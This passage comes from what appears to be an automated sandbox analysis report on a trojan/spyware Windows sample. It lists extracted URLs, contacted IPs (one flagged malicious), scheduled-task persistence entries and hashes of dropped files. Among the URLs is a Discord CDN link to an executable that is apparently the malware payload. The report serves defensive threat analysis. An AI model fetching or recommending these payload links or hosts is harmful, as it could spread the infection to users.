                                                                                              https://cdn.discordapp.com/attachments/914960103592054858/914986994759794738/Underdosed.exeC169.exe, 00000017.00000002.593626249.0000000002CE0000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.597625234.0000000002F9B000.00000004.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://schemas.xmlsoap.org/ws/2005/02/trust/RST/IssueA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponseA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://tempuri.org/Entity/Id5ResponseA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    		unknown
                                                                                                    http://schemas.xmlsoap.org/ws/2004/08/addressing/faultDC169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dnsA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://tempuri.org/Entity/Id10ResponseA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                        • URL Reputation: safe
                                                                                                        		unknown
                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/RenewA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://tempuri.org/Entity/Id8ResponseA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          https://support.google.com/chrome/?p=plugin_wmpA70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://95.181.152.139C169.exe, 00000017.00000002.597347533.0000000002F77000.00000004.00000001.sdmpfalse
                                                                                                            • Avira URL Cloud: safe
                                                                                                            		unknown
                                                                                                            http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionIDA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCTA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://schemas.xmlsoap.org/ws/2006/02/addressingidentityA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593626249.0000000002CE0000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKeyA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wsat/RollbackA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://support.google.com/chrome/?p=plugin_javaA70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://tempuri.org/Entity/Id22ResponsexC169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCTA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://cdn.discordapp.com4C169.exe, 00000017.00000002.597704836.0000000002FA1000.00000004.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://schemas.xmlsoap.org/ws/2004/06/addressingexA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://tempuri.org/Entity/Id19ResponsexC169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            		unknown
                                                                                                                            http://schemas.xmlsoap.org/ws/2004/04/security/trust/NonceA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponseA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://cdn.discordapp.comC169.exe, 00000017.00000002.597768606.0000000002FB3000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://support.google.com/chrome/?p=plugin_divxC169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://tempuri.org/Entity/Id13ResponseA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentifA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/10/wsat/CommittedA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://schemas.xmlsoap.org/ws/2005/05/identity/right/possesspropertyA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/sc/sctA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://socfinder.siteA70A.exe, 0000000B.00000000.415048801.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000002.576541484.0000000001327000.00000002.00020000.sdmp, A70A.exe, 0000000B.00000003.417761499.0000000003471000.00000004.00000001.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    		unknown
                                                                                                                                                    http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgementA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCTA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoA70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603065372.0000000003E71000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603701559.0000000003EA8000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600555939.0000000003D43000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599060773.00000000030D7000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.595143338.0000000002EB5000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600180400.0000000003CD2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymousA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_WrapA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              http://schemas.xmlsoap.org/ws/2002/12/policyA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://tempuri.org/Entity/Id22ResponseA70A.exe, 0000000B.00000002.601972098.0000000003DB2000.00000004.00000001.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                		unknown
                                                                                                                                                                https://search.yahoo.com/favicon.icohttps://search.yahoo.com/searchA70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603065372.0000000003E71000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.603701559.0000000003EA8000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600555939.0000000003D43000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599060773.00000000030D7000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.595143338.0000000002EB5000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.599190914.00000000030ED000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.600180400.0000000003CD2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598194373.0000000003016000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594596354.0000000002DF3000.00000004.00000001.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/IssueA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://schemas.xmlsoap.org/ws/2005/02/trust/IssueA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://get.adobA70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://schemas.xmlsoap.org/ws/2005/02/trust/spnegoA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://schemas.xmlsoap.org/ws/2005/02/scA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            http://tempuri.org/Entity/Id18ResponseA70A.exe, 0000000B.00000002.603991878.0000000003EBE000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, A70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmpfalse
                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://service.real.com/realplayer/security/02062012_player/en/A70A.exe, 0000000B.00000002.606343545.0000000004099000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.594676104.0000000002E09000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.598347234.000000000302C000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsdA70A.exe, 0000000B.00000002.601138545.0000000003CC2000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.593807750.0000000002CE4000.00000004.00000001.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://tempuri.org/Entity/Id3ResponseA70A.exe, 0000000B.00000002.600595408.0000000003C31000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.589600785.0000000002C51000.00000004.00000001.sdmp, C169.exe, 00000017.00000002.596302776.0000000002ECB000.00000004.00000001.sdmpfalse
                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                		unknown

                                                                                                                                                                                Contacted IPs

                                                                                                                                                                                • No. of IPs < 25%
                                                                                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                                                                                • 75% < No. of IPs

                                                                                                                                                                                Public

                                                                                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                95.213.165.249
                                                                                                                                                                                		host-data-coin-11.comRussian Federation
                                                                                                                                                                                		49505SELECTELRUfalse
                                                                                                                                                                                45.9.20.149
                                                                                                                                                                                		unknownRussian Federation
                                                                                                                                                                                		35913DEDIPATH-LLCUStrue
                                                                                                                                                                                162.159.135.233
                                                                                                                                                                                		cdn.discordapp.comUnited States
                                                                                                                                                                                		13335CLOUDFLARENETUSfalse

                                                                                                                                                                                Private

                                                                                                                                                                                IP
                                                                                                                                                                                192.168.2.1

                                                                                                                                                                                General Information

                                                                                                                                                                                Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                                                Analysis ID:531737
                                                                                                                                                                                Start date:01.12.2021
                                                                                                                                                                                Start time:10:02:38
                                                                                                                                                                                Joe Sandbox Product:CloudBasic
                                                                                                                                                                                Overall analysis duration:0h 14m 32s
                                                                                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                                                                                Report type:light
                                                                                                                                                                                Sample file name:QMn13jz6nj.exe
                                                                                                                                                                                Cookbook file name:default.jbs
                                                                                                                                                                                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                                                Number of analysed new started processes analysed:36
                                                                                                                                                                                Number of new started drivers analysed:0
                                                                                                                                                                                Number of existing processes analysed:0
                                                                                                                                                                                Number of existing drivers analysed:0
                                                                                                                                                                                Number of injected processes analysed:1
                                                                                                                                                                                Technologies:
                                                                                                                                                                                • HCA enabled
                                                                                                                                                                                • EGA enabled
                                                                                                                                                                                • HDC enabled
                                                                                                                                                                                • AMSI enabled
                                                                                                                                                                                Analysis Mode:default
                                                                                                                                                                                Analysis stop reason:Timeout
                                                                                                                                                                                Detection:MAL
                                                                                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@33/32@65/4
                                                                                                                                                                                EGA Information:Failed
                                                                                                                                                                                HDC Information:
                                                                                                                                                                                • Successful, ratio: 64.8% (good quality ratio 45.4%)
                                                                                                                                                                                • Quality average: 55.5%
                                                                                                                                                                                • Quality standard deviation: 41.5%
                                                                                                                                                                                HCA Information:
                                                                                                                                                                                • Successful, ratio: 70%
                                                                                                                                                                                • Number of executed functions: 0
                                                                                                                                                                                • Number of non-executed functions: 0
                                                                                                                                                                                Cookbook Comments:
                                                                                                                                                                                • Adjust boot time
                                                                                                                                                                                • Enable AMSI
                                                                                                                                                                                • Found application associated with file extension: .exe
                                                                                                                                                                                Warnings:
                                                                                                                                                                                Show All
                                                                                                                                                                                • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                                                                • HTTP Packets have been reduced
                                                                                                                                                                                • TCP Packets have been reduced to 100
                                                                                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                                                • Excluded IPs from analysis (whitelisted): 20.42.73.29
                                                                                                                                                                                • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com
                                                                                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                                                                                                                Simulations

                                                                                                                                                                                Behavior and APIs

                                                                                                                                                                                TimeTypeDescription
                                                                                                                                                                                10:04:26Task SchedulerRun new task: Firefox Default Browser Agent E57885D5CBE89C26 path: C:\Users\user\AppData\Roaming\ddigjgj
                                                                                                                                                                                10:04:57API Interceptor1x Sleep call for process: AA02.exe modified
                                                                                                                                                                                10:05:39API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                10:05:55Task SchedulerRun new task: tkools.exe path: C:\Users\user\AppData\Local\Temp\6829558ede\tkools.exe

                                                                                                                                                                                Joe Sandbox View / Context

                                                                                                                                                                                IPs

                                                                                                                                                                                No context

                                                                                                                                                                                Domains

                                                                                                                                                                                No context

                                                                                                                                                                                ASN

                                                                                                                                                                                No context

                                                                                                                                                                                JA3 Fingerprints

                                                                                                                                                                                No context

                                                                                                                                                                                Dropped Files

                                                                                                                                                                                No context

                                                                                                                                                                                Created / dropped Files

                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_D466.exe_db70fee994372ed317f1af178f5e275a698060_66b74b96_1b8421ab\Report.wer
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):65536
                                                                                                                                                                                Entropy (8bit):0.8208203291713381
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:96:E/FE6X7jPQuN4lOQoJ7R3V6tpXIQcQec6tycEfcw3W+HbHg/8BRTf3o8Fa9iVfOs:qiLuNl8HQ0lrjJ5/u7szS274Itr
                                                                                                                                                                                MD5:23AB1CDA7F86C265D6863DEDC315625D
                                                                                                                                                                                SHA1:87D750256912BC84594B89310CD7B9018E6586A0
                                                                                                                                                                                SHA-256:C50B2EF12FB27DE639E5EE07477140FC66158D3E798A49A0DEA04143A0F1E2EC
                                                                                                                                                                                SHA-512:B284891D2FA86C6E25822574A6FC798C8812D9E3F400342A45BD8499FADC31F6DCA736DF1BC0BD6B136AC011CDB436EC2E8995B1B475C3262A07C2BDD37951F3
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.2.8.5.5.5.0.4.9.5.2.3.7.7.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.2.8.5.5.5.3.7.9.4.0.4.5.2.0.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.8.a.5.d.e.9.-.d.d.7.3.-.4.7.7.a.-.8.f.5.5.-.2.2.2.b.c.9.8.a.7.d.1.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.6.4.0.8.2.f.e.2.-.d.a.d.2.-.4.9.1.d.-.a.5.3.3.-.c.0.1.8.2.3.5.1.5.9.b.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.D.4.6.6...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.9.e.c.-.0.0.0.1.-.0.0.1.c.-.b.b.f.f.-.5.2.e.9.d.d.e.6.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.7.1.e.7.a.f.d.3.c.a.a.5.c.9.3.6.8.c.b.d.1.e.d.4.d.4.2.9.9.3.e.e.0.0.0.0.2.4.0.1.!.0.0.0.0.b.2.1.8.7.d.e.b.c.6.f.d.e.9.6.e.0.8.d.5.0.1.4.c.e.4.f.1.a.f.5.c.f.5.6.8.b.c.e.5.!.D.4.6.6...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER2114.tmp.dmp
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                File Type:Mini DuMP crash report, 14 streams, Wed Dec 1 18:05:08 2021, 0x1205a4 type
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):40540
                                                                                                                                                                                Entropy (8bit):1.9473812799118777
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:iM4MlwxT/BOepbDmI5L82sf0Ye6lXpCjqTmISO:WhFceUPLpSO
                                                                                                                                                                                MD5:88C0D07F911DB2E607B3474BA0981EC9
                                                                                                                                                                                SHA1:BB0F558813CFB9EADA2675C259A7B7EE854DBD31
                                                                                                                                                                                SHA-256:DAD864879C5519F61320B45B416DF81280046F0159AE030883B16D8DCBCC8904
                                                                                                                                                                                SHA-512:AAC35A21934397EB5FCB58E5BD0FDD7A49708D229A8262BC3D1F60F7C33822F528EDC0F48ECD99B2D5F4C9B4A35C45AD4F35C950CFED8C530A158C3922FD5063
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                Preview: MDMP....... .......T..a.........................................(..........T.......8...........T............................................................................................................U...........B......h.......GenuineIntelW...........T...........8..a............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER41AD.tmp.WERInternalMetadata.xml
                                                                                                                                                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                                                                                                                Category:dropped
                                                                                                                                                                                Size (bytes):8412
                                                                                                                                                                                Entropy (8bit):3.7025484182768764
                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                SSDEEP:192:Rrl7r3GLNicw656YF+SU8hZetAgmfRRSqCpDQ89bIwsfNtYm:RrlsNiT656YcSU8SAgmfRRSXIDfN3
                                                                                                                                                                                MD5:222DE9514D79DF1715B4AB9D0B37A015
                                                                                                                                                                                SHA1:7F41D897D493E04E970DD5D24263E0086FD8D9B6
                                                                                                                                                                                SHA-256:2693C972E5D058373F1684599CCD18E4D142ADFC4E39B346F5B8068D73794804
                                                                                                                                                                                SHA-512:5FB1A7FF911ABFA2D63C12461C71C04F91330F6AF78874EBE88FB54BD08BA2BCD530339F2DFF0DFA5FE1BD35F11CBF45B509FC2ED675B813DB3E1446D69B712F
                                                                                                                                                                                Malicious:false
                                                                                                                                                                                Reputation:unknown
